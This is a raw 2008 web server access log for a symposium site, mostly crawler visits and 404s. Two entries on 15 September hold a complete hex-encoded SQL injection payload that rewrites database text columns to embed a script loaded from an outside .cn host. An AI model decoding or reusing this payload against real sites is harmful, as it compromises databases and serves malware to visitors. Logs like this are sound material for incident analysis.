69.247.29.122 - - [14/Sep/2008:13:55:14 -0400] "GET / HTTP/1.1" 200 326 "http://www.google.com/search?num=30&hl=en&lr=lang_en&newwindow=1&safe=off&as_qdr=all&q=%22edward+s.+clark%22+polymers" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
69.247.29.122 - - [14/Sep/2008:13:56:27 -0400] "GET /Program.html HTTP/1.1" 404 - "http://www.google.com/search?num=30&hl=en&lr=lang_en&newwindow=1&safe=off&as_qdr=all&q=%22edward+s.+clark%22+polymers" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
74.6.8.114 - - [14/Sep/2008:14:56:30 -0400] "GET /logs/access.log HTTP/1.0" 200 74074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.8.114 - - [14/Sep/2008:16:58:00 -0400] "GET /Program.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
218.94.133.179 - - [14/Sep/2008:21:41:10 -0400] "GET /Sponsors.html HTTP/1.1" 404 - "http://www.google.com/search?hl=en&newwindow=1&q=Chloe+Singleton+birthday" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" 0 www.geil-symposium.com
64.246.165.170 - - [14/Sep/2008:21:52:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "http://www.whois.sc/" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
64.246.165.170 - - [14/Sep/2008:21:52:16 -0400] "GET / HTTP/1.1" 200 326 "http://www.whois.sc/geil-symposium.com" "SurveyBot/2.3 (Whois Source)" 0 www.geil-symposium.com
74.6.18.230 - - [14/Sep/2008:22:58:29 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.230 - - [14/Sep/2008:22:58:30 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.230 - - [15/Sep/2008:09:34:18 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.230 - - [15/Sep/2008:09:34:18 -0400] "GET /Venue.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.230 - - [15/Sep/2008:10:30:27 -0400] "GET /logs HTTP/1.0" 301 331 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.230 - - [15/Sep/2008:10:30:27 -0400] "GET /logs/ HTTP/1.0" 200 373 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
38.100.41.112 - - [15/Sep/2008:11:11:35 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.100.41.112 - - [15/Sep/2008:11:12:09 -0400] "GET /logs HTTP/1.1" 301 343 "http://www.geil-symposium.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.100.41.112 - - [15/Sep/2008:11:13:14 -0400] "GET /logs/ HTTP/1.1" 200 385 "http://www.geil-symposium.com/logs" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 0 www.geil-symposium.com
38.100.41.112 - - [15/Sep/2008:11:14:18 -0400] "GET /logs/access.log HTTP/1.1" 200 76738 "http://www.geil-symposium.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 1 www.geil-symposium.com
38.100.41.112 - - [15/Sep/2008:11:14:19 -0400] "GET /logs/error.log HTTP/1.1" 200 53870 "http://www.geil-symposium.com/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2)" 1 www.geil-symposium.com
89.132.237.244 - - [15/Sep/2008:11:46:31 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; hu; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" 0 www.geil-symposium.com
74.6.17.186 - - [15/Sep/2008:12:13:36 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.186 - - [15/Sep/2008:12:13:36 -0400] "GET / HTTP/1.0" 200 310 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [15/Sep/2008:15:06:54 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [15/Sep/2008:15:06:54 -0400] "GET /logs/access.log HTTP/1.0" 200 77921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
77.91.224.13 - - [15/Sep/2008:16:31:18 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
75.12.45.152 - - [15/Sep/2008:21:49:56 -0400] "GET /logs/access.log?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 78291 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DigExt; .NET CLR 1.1.4322)" 2 www.geil-symposium.com
75.12.45.152 - - [15/Sep/2008:21:50:20 -0400] "GET /logs/access.log?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777302E646F7568756E716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 79798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; DigExt; .NET CLR 1.1.4322)" 9 www.geil-symposium.com
66.249.72.109 - - [16/Sep/2008:00:54:52 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.72.109 - - [16/Sep/2008:00:54:52 -0400] "GET /images/AdvancedSurfaceMicroscopyLogo.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
217.218.240.219 - - [16/Sep/2008:01:00:23 -0400] "GET / HTTP/1.1" 200 326 "http://www.google.com/search?hl=en&client=firefox-a&channel=s&rls=org.mozilla%3Aen-US%3Aofficial&hs=nPn&q=+Phillip+Geil&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
217.218.240.219 - - [16/Sep/2008:01:00:23 -0400] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16" 0 www.geil-symposium.com
208.80.194.45 - - [16/Sep/2008:01:41:01 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; {035D325C-2A8D-A02D-34A0-97CF9DCD2591}; .NET CLR 1.1.4322; SpamBlockerUtility 4.7.1; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
77.91.224.13 - - [16/Sep/2008:02:31:29 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
208.111.154.16 - - [16/Sep/2008:11:36:27 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [16/Sep/2008:11:36:28 -0400] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.22.119 - - [16/Sep/2008:12:13:10 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [16/Sep/2008:12:13:10 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
202.179.180.45 - - [16/Sep/2008:15:01:48 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [16/Sep/2008:15:01:53 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
66.249.72.109 - - [16/Sep/2008:15:10:22 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.72.109 - - [16/Sep/2008:15:10:22 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.72.109 - - [16/Sep/2008:18:52:35 -0400] "GET /images/DaikinLogo.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
38.99.13.124 - - [16/Sep/2008:21:32:30 -0400] "GET /publications.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [16/Sep/2008:21:58:00 -0400] "GET /accommodations.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
202.160.179.116 - - [16/Sep/2008:22:42:00 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [16/Sep/2008:22:42:10 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
38.99.13.124 - - [16/Sep/2008:23:55:23 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [17/Sep/2008:01:14:53 -0400] "GET /Sponsors.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
65.214.45.223 - - [17/Sep/2008:02:10:08 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
65.214.45.223 - - [17/Sep/2008:02:10:08 -0400] "GET /transportation.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 0 www.geil-symposium.com
38.99.13.124 - - [17/Sep/2008:02:26:00 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [17/Sep/2008:02:38:53 -0400] "GET /Venue.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
38.99.13.124 - - [17/Sep/2008:02:54:45 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
208.80.194.30 - - [17/Sep/2008:04:33:52 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SIMBAR={E8CDB979-895C-44a7-A7AA-94716DF46442}; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" 0 www.geil-symposium.com
38.99.13.124 - - [17/Sep/2008:05:11:11 -0400] "GET /Program.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
66.249.72.109 - - [17/Sep/2008:06:53:33 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.72.109 - - [17/Sep/2008:06:53:33 -0400] "GET /images/ZeissLogo.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
74.6.22.119 - - [17/Sep/2008:06:54:20 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [17/Sep/2008:06:54:21 -0400] "GET /Scholarship.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [17/Sep/2008:12:23:56 -0400] "GET /logs/error.log HTTP/1.0" 200 60890 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
77.73.186.83 - - [17/Sep/2008:14:01:53 -0400] "GET /logs/access.log HTTP/1.0" 200 87595 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AM Browser 2.0.1)" 4 www.geil-symposium.com
74.6.22.119 - - [17/Sep/2008:16:05:32 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [17/Sep/2008:16:05:32 -0400] "GET /logs/access.log HTTP/1.0" 200 87981 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.45 - - [17/Sep/2008:23:38:31 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {32180D6D-A308-BBF6-6DA4-3C361CD13E94}; .NET CLR 1.1.4322; SpamBlockerUtility 4.7.5)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Sep/2008:03:37:07 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [18/Sep/2008:03:37:08 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
74.6.22.119 - - [18/Sep/2008:03:47:46 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.119 - - [18/Sep/2008:03:47:46 -0400] "GET /Sponsors.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
89.129.253.245 - - [18/Sep/2008:09:39:48 -0400] "GET /logs/access.log HTTP/1.1" 200 89175 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 1 www.geil-symposium.com
195.60.8.193 - - [18/Sep/2008:09:47:51 -0400] "GET /logs/access.log HTTP/1.1" 200 89347 "-" "pjlqlxxaNmbfav 0qff0ycydcqt0lvtiiNlql" 6 www.geil-symposium.com
74.6.17.186 - - [18/Sep/2008:09:55:14 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.186 - - [18/Sep/2008:09:55:14 -0400] "GET /logs HTTP/1.0" 301 323 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.17.186 - - [18/Sep/2008:09:55:14 -0400] "GET /logs/ HTTP/1.0" 200 369 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Sep/2008:10:12:06 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.15 - - [18/Sep/2008:10:12:06 -0400] "GET /transportation.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Sep/2008:11:33:23 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
208.111.154.16 - - [18/Sep/2008:11:33:23 -0400] "GET /Registration.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" 0 www.geil-symposium.com
77.91.224.13 - - [18/Sep/2008:13:53:48 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
38.99.13.124 - - [18/Sep/2008:15:52:17 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
202.179.180.45 - - [18/Sep/2008:20:56:10 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
202.179.180.45 - - [18/Sep/2008:20:56:16 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/4.0 (compatible; NaverBot/1.0; http://help.naver.com/delete_main.asp)" 0 www.geil-symposium.com
208.80.194.39 - - [19/Sep/2008:00:52:54 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; ZangoToolbar 4.8.2; SpamBlockerUtility 4.8.4)" 0 www.geil-symposium.com
74.6.22.174 - - [19/Sep/2008:01:02:21 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [19/Sep/2008:01:02:21 -0400] "GET /logs/error.log HTTP/1.0" 200 64004 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.65.200 - - [19/Sep/2008:06:27:47 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.65.200 - - [19/Sep/2008:06:27:48 -0400] "GET /images/ZeissLogo.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
195.60.8.193 - - [19/Sep/2008:06:51:39 -0400] "GET /logs/access.log HTTP/1.1" 200 92443 "-" "qouqdv4xmhmrirqcrJowvf" 5 www.geil-symposium.com
66.249.65.200 - - [19/Sep/2008:08:29:54 -0400] "GET /Program.html HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 0 www.geil-symposium.com
66.249.65.200 - - [19/Sep/2008:15:47:23 -0400] "GET /images/candle1.jpg HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.34.204.26 - - [19/Sep/2008:16:19:22 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [19/Sep/2008:16:19:22 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
66.34.204.26 - - [19/Sep/2008:16:19:22 -0400] "GET / HTTP/1.1" 200 322 "http://www.keywordspy.com/keyword-research/geil-symposium.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Alexa Toolbar)" 0 www.geil-symposium.com
77.81.182.204 - - [19/Sep/2008:17:00:57 -0400] "GET /logs/access.log HTTP/1.1" 200 93594 "-" "qckisjfbofaxgh6kurhqg6s6wsalfb" 1 www.geil-symposium.com
66.249.65.200 - - [19/Sep/2008:20:57:39 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
66.249.65.200 - - [19/Sep/2008:20:57:39 -0400] "GET /images/logo_dupont.gif HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
74.6.18.222 - - [19/Sep/2008:21:42:42 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.222 - - [19/Sep/2008:21:42:43 -0400] "GET /logs/access.log HTTP/1.0" 200 94212 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [20/Sep/2008:01:05:30 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [20/Sep/2008:01:05:30 -0400] "GET /logs/error.log HTTP/1.0" 200 65940 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.222 - - [20/Sep/2008:04:07:55 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.18.222 - - [20/Sep/2008:04:07:55 -0400] "GET /logs/error.log HTTP/1.0" 200 66175 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.52.245.146 - - [20/Sep/2008:04:22:36 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" 0 www.geil-symposium.com
38.99.13.124 - - [20/Sep/2008:07:51:49 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.174 - - [20/Sep/2008:13:08:30 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [20/Sep/2008:13:08:31 -0400] "GET /Registration.html HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
208.80.194.45 - - [20/Sep/2008:18:28:01 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/4.0 (compatible; MSIE 6.0; AOL 9.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" 0 www.geil-symposium.com
91.205.124.13 - - [20/Sep/2008:18:41:18 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
74.6.22.174 - - [20/Sep/2008:19:57:21 -0400] "GET /logs/access.log HTTP/1.0" 200 96322 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
202.108.7.214 - - [21/Sep/2008:01:09:56 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
202.108.7.214 - - [21/Sep/2008:01:09:57 -0400] "GET / HTTP/1.1" 200 326 "-" "Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )" 0 www.geil-symposium.com
203.209.252.68 - - [21/Sep/2008:04:30:28 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
202.160.178.101 - - [21/Sep/2008:04:30:29 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" 0 www.geil-symposium.com
91.205.124.13 - - [21/Sep/2008:04:41:29 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 0 www.geil-symposium.com
38.99.13.124 - - [21/Sep/2008:08:20:47 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 0 www.geil-symposium.com
74.6.22.174 - - [21/Sep/2008:10:19:16 -0400] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
74.6.22.174 - - [21/Sep/2008:10:19:16 -0400] "GET / HTTP/1.0" 200 314 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 0 www.geil-symposium.com
66.249.65.200 - - [21/Sep/2008:14:14:08 -0400] "GET /robots.txt HTTP/1.1" 404 - "-" "Googlebot-Image/1.0" 0 www.geil-symposium.com
